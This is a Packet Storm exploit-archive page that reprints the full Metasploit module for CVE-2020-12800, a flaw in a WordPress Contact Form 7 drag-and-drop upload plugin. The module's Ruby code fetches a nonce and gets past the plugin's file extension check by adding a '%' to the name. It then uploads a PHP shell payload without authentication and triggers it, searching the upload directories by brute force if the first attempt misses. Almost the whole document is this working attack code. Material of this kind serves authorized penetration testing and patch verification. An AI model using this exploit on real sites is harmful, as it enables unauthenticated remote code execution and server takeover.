exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Drag And Drop Multi File Uploader Remote Code Execution

WordPress Drag And Drop Multi File Uploader Remote Code Execution
Posted Jun 4, 2020
Authored by h00die, Austin Martin | Site metasploit.com

This Metasploit module exploits a file upload feature of Drag and Drop Multi File Upload - Contact Form 7 for versions prior to 1.3.4. The allowed file extension list can be bypassed by appending a %, allowing for php shells to be uploaded. No authentication is required for exploitation.

tags | exploit, shell, php, file upload
advisories | CVE-2020-12800
SHA-256 | d94c9f0362d25709f05afe545bc81aff8520f8eb38e83726bf24a2463da16a0a

WordPress Drag And Drop Multi File Uploader Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Wordpress

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wordpress Drag and Drop Multi File Uploader RCE',
'Description' => %q{
This module exploits a file upload feature of Drag and Drop Multi File
Upload - Contact Form 7 for versions prior to 1.3.4. The allowed file
extension list can be bypassed by appending a %, allowing for php
shells to be uploaded.
No authentication is required for exploitation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Austin Martin <amartin@amartinsec.com>' # original PoC, discovery
],
'References' =>
[
['EDB', '48520'],
['CVE', '2020-12800'],
['URL', 'https://github.com/amartinsec/CVE-2020-12800']
],
'Platform' => ['php'],
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDate' => 'May 11 2020',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of Wordpress', '/'])
]
)
end

# recursively search uploads folder(s) to find our payload
def find_payload(path, payload_name)
return unless @payload_location.nil?

path = normalize_uri(target_uri.path, path)
print_status("Checking #{path}")
res = send_request_cgi(
'uri' => path
)
unless res
vprint_error('Server didnt respond when attempting to trigger payload')
return
end
if res.body.include? payload_name
print_good("Found payload: #{path}#{payload_name}")
@payload_location = "#{path}#{payload_name}"
return
end

# /a href="([\w\-\/]+)"/.match(res.body) do |url|
res.body.scan(%r{a href="([\w\-/]+)"}) do |url|
if url[0].start_with? '/'
# skip it, its the parent directory
elsif url[0].end_with? '/'
find_payload("#{path}#{url[0]}", payload_name)
end
end
end

def check
begin
return check_plugin_version_from_readme('drag-and-drop-multiple-file-upload-contact-form-7', '1.3.4', '1')
rescue ::Rex::ConnectionError
vprint_error('Could not connect to the web service')
return CheckCode::Unknown
end
CheckCode::Safe
end

def exploit
vprint_status('Getting nonce')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path)
)
unless res
fail_with(Failure::Unreachable, 'No server response')
end

if res.code != 200
fail_with(Failure::UnexpectedReply, 'Non-200 response, check targeturi')
end

/ajax_nonce":"(?<nonce>.{10})"/ =~ res.body
if nonce.nil?
fail_with(Failure::UnexpectedReply, 'Nonce not found')
end
print_status("Nonce: #{nonce}")

payload_name = "#{rand_text_alphanumeric(6..12)}.php"

data = Rex::MIME::Message.new
data.add_part('5242880', nil, nil, 'form-data; name="size_limit"')
data.add_part('php%', nil, nil, 'form-data; name="supported_type"')
data.add_part('dnd_codedropz_upload', nil, nil, 'form-data; name="action"')
data.add_part('click', nil, nil, 'form-data; name="type"')
data.add_part(nonce, nil, nil, 'form-data; name="security"')
data.add_part(payload.encoded, 'text/plain', nil, "form-data; name='upload-file'; filename='#{payload_name}%'")

# grab our valid cookie
cookie = res.get_cookies

vprint_status('Attempting payload upload')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
'method' => 'POST',
'cookie' => cookie,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)

unless res
fail_with(Failure::Unreachable, 'No server response')
end

if res.code == 403
fail_with(Failure::UnexpectedReply, '403 response, nonce detection failed')
elsif res.code == 500
fail_with(Failure::UnexpectedReply, '500 response, server misconfigured, may need php-mbstring')
end
print_good('Payload uploaded successfully')
register_file_for_cleanup(payload_name)

# first we attempt to trigger the most obvious location of the payload.
print_status('Attempting to trigger at well known location')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wp_dndcf7_uploads', 'wpcf7-files', payload_name)
)

unless session_created?
fail_with(Failure::Unreachable, 'No server response') unless res

# dont need to check for 200, since that would have triggered our payload
if res.code != 200
print_status('Bruteforcing for payload to trigger')
find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name)
unless @payload_location
fail_with(Failure::Unknown, 'Unable to determine uploaded shell path')
end
# lastly, if we have a location found, trigger it
send_request_cgi('uri' => @payload_location)
end
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Could not connect to the web service')
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close